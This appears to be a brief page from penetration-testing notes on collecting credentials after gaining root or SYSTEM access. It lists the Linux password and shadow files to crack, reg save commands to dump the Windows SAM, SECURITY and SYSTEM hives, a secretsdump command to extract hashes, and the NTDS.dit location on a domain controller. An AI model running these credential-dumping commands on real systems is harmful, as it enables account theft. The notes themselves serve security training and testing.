Loot

Once we are root or NT AUTHORITY\SYSTEM it's time to collect some loot. 🤑🤑🤑
Linux
Dump users and passwords
Collect files on target
/etc/passwd
/erc/shadow
Then unshadow and crack them.
Windows
Dump SAM
Collect files on target
reg save hklm\sam .\sam
reg save hklm\security .\security
reg save hklm\system .\system
Then crack them using Impackets' secretsdump
secretsdump.py -sam sam -security security -system system LOCAL
Dump NTDS (DC)
By default, the Ntds.dit file is located in %SystemRoot%\NTDS\Ntds.dit of a domain controller.
TODO (see /13-misc/impacket.md)

Last modified 9mo ago